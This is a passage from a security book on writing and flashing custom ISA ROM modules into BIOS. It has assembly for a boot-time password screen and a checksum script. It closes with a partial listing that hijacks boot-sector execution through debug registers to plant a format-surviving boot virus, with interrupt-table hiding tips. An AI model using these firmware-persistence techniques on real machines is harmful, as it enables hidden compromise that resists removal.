Baptizing by Fire, or Creating an ISA ROM Module

Now, having described the BIOS structure, it is possible to write a custom extension. For simplicity, I'll demonstrate this technique by writing a nonstandard ISA ROM module. As a rule, such modules are used for managing integrated ISA controllers (such as additional COM ports). There is no ISA controller on the motherboard (ISA slots have disappeared from motherboards); however, BIOS continues to support ISA modules, mainly because programmers do not want to touch working code that was debugged long ago. The ISA module loads after the main BIOS code (original.tmp) completes execution, and it obtains full control over all equipment, including the PCI bus. If desired, it is also possible to add a custom PCI module; however, this task is much more difficult. To achieve this goal, it would be necessary to set the expansion ROM base address register (XROMBAR) and forge the PCI device identifier in the module header so that it corresponds to the identifier of an actual device.

The ISA module is a standard binary file, with a size that is a multiple of 200h bytes, always loaded at an xxxx:0000h address. Some of the hardware (main memory, keyboard, video adapter) has already been initialized by the time the ISA module is called, but other devices (such as hard disks) are not initialized yet. The INT 10h (video) and INT 16h (keyboard) interrupts can be used without hesitation; INT 13h (disks), however, cannot be relied on at this point.

The ISA module starts with the standard 55 AA header, and its last byte stores the checksum. The simplest ISA ROM module written in FASM appears as shown in Listing 32.9. During system boot, this module displays a welcome string and waits for the password. To reenter the password, press <Enter>. This BIOS hack provides additional password protection. Note that no one would be able to crack this protection without replacing BIOS.

Listing 32.9: An ISA module implementing additional password protection

; ISAOEM.ASM
use16                           ; The ISA module runs in a 16-bit segment.
        DB      55h, 0AAh       ; Boot signature (55 AA)
        DB      01h             ; Block size in sectors (200h each)
        JMP     x_code          ; Pass control to the password protection code.

x_code:
        ; Prepare the registers
        ; ---------------------
        PUSH    CS              ; LODSB reads DS:SI, so DS must point at
        POP     DS              ; the segment the module was loaded into.
        MOV     DX, 101Dh       ; Where to output (DH - Y, DL - X)
        MOV     SI, text        ; What to output
        XOR     BX, BX          ; Initial character color - 1 (BH = video page 0)
        MOV     CX, 1           ; Output one character at a time.

        ; Display the color string.
        ; -------------------------
print_string:
        MOV     AH, 02h         ; Function for controlling the cursor
        INT     10h             ; Position the cursor.
        INC     DL              ; Move to the next position.
        LODSB                   ; Load the next character.
        TEST    AL, AL          ; Is this the end of the line?
        JZ      input           ; Exit if yes.
        MOV     AH, 09h         ; Function for printing a character
        INC     BL              ; Use all colors, one by one.
        INT     10h             ; Print the character.
        JMP     print_string    ; Loop

input:  ; Wait for the password.
        ; ----------------------
        XOR     DX, DX          ; Checksum of the characters typed so far
enters:
        XOR     AX, AX          ; Function for reading a character from the keyboard
        INT     16h             ; Read the character.
        CMP     AL, 0Dh         ; Is this ENTER?
        JZ      input           ; If yes, start the input again.
        XOR     AH, AH          ; Clear the scan code.
        ADD     DX, AX          ; Add the character to the checksum.
        CMP     DX, 'm' + 's' + 'o' + ']' + '['
        JNZ     enters          ; If the password is incorrect, keep reading.
        RETF                    ; Password accepted: return to BIOS.

text    DB      "Matrix has you!", 0

After translating the source file using FASM (issue the FASM ISAOEM.ASM command), you'll obtain the isaoem.bin file. Load this file into HIEW, pad it with zeros to make its size a multiple of 200h bytes, then compute the checksum. The checksum is computed using a standard method: sum all bytes and take the remainder from division by 100h, i.e. sum = (sum + next_byte) & 0xFF. The checksum of the entire block must equal zero; consequently, the last byte of the block is (100h - sum) & 0xFF. For computing the checksum, I have written a simple IDA script, shown in Listing 32.10.

Listing 32.10: Simple IDA script that automatically computes the checksum

// Recompute the trailing checksum byte of the ROM image loaded into IDA.
static main()
{
    auto a, b;
    b = 0;
    PatchByte(MaxEA() - 1, 0);          // Zero the checksum byte first.
    for (a = MinEA(); a < MaxEA(); a++)
        b = (b + Byte(a)) & 0xFF;       // Sum all bytes modulo 100h.
    b = (0x100 - b) & 0xFF;             // The byte that makes the total sum zero
    Message("\n%x\n", b);
    PatchByte(MaxEA() - 1, b);          // Write it as the last byte of the image.
}

As a variant, it is possible to use Hex Workshop (Tools > Generate Checksum > 8 bit checksum). In this case, Hex Workshop reports that the checksum is CFh; consequently, the last byte is 100h - CFh == 31h. Write it at offset 1FFh and exit HIEW. Add the newly written module into BIOS (by issuing the following command: CBROM.EXE 4PE83619.BIN /ISA ISAOEM.bin), then flash BIOS using UniFlash or any other utility. Having completed this, reboot the system. If everything was done correctly, the boot screen will appear as shown in Fig. 32.4.

Figure 32.4: Hacked BIOS waits for the user to supply a password

It works! Notice that although the standard password protection set in BIOS Setup can be easily removed by pulling a single jumper on the motherboard (Fig. 32.5), this trick won't work against the preceding example. This time, to remove the password protection, it would be necessary to replace BIOS.

Figure 32.5: Standard password-protection set in BIOS Setup can be removed by removing a single jumper on the motherboard; however, this method won't work with the hacked BIOS

Now, it is time to explain how to hack hard disks (for example, it is possible to write a boot virus that would reconstruct itself after formatting the drive). The INT 13h interrupt won't help here, because the ISA block completes its operation before disk initialization. Therefore, it is necessary to write a resident module. (Who said viruses do not live in BIOS?) The main BIOS code always loads the boot/MBR sector at address 0000:7C00h and passes control to it. Set a hardware breakpoint on this address, and it will fire at the instant when all equipment has already been initialized.

The only problem is concealing the extra code. By default, the ISA block is unpacked into main memory, which is later overwritten by everyone. Long ago, in the time of MS-DOS, many viruses were placed inside the interrupt table, the upper part of which remains unused. The unused space starts from 0000:01E0h and spans to approximately 0000:0384h, where it is possible to place roughly 360 bytes of custom interrupt handler. For hacking purposes, this is enough.

The code shown in Listing 32.11 sets the hardware breakpoint and traps the INT 01h interrupt generated when control passes to the boot sector. Every hacker must write the handler on his or her own. This is a standard boot virus, examples of which can be easily found on the Internet.

Listing 32.11: Interrupt handler passes control to the virus code when the boot sector is loaded

        MOV     AX, CS
        XOR     BX, BX                      ; Trap the INT 01h interrupt:
        MOV     DS, BX                      ; the interrupt table lives in segment 0000h.
        MOV     [BX], offset our_vx_code    ; Offset of the custom handler
        MOV     [BX + 2], BX                ; in relation to segment 0000h
        MOV     DS, AX
        MOV     EAX, 00000000000000001100000010b
        ; Bit layout of the value loaded into DR7 (from the lowest bit up):
        ;   bit 0       - Lx; can be set
        ;   bit 1       - Gx; any
        ;   bits 8-9    - LE & GE. P6 ignores them; therefore, their value is not critical.
        ;   bits 16-17  - R/W: 00 = break on execution
        ;   bits 18-19  - LEN: breakpoint length - 1 byte
        MOV     EBX, 7C00h                  ; Linear physical address of the buffer
                                            ; into which the boot sector will be loaded
        MOV     DR7, EAX
        MOV     DR0, EBX
        ; Load the values into the debug registers. Starting from this point,
        ; any access to the breakpoint will generate INT 01h.


Shellcoder's Programming Uncovered
ISBN: 193176946X
Year: 2003
Pages: 164
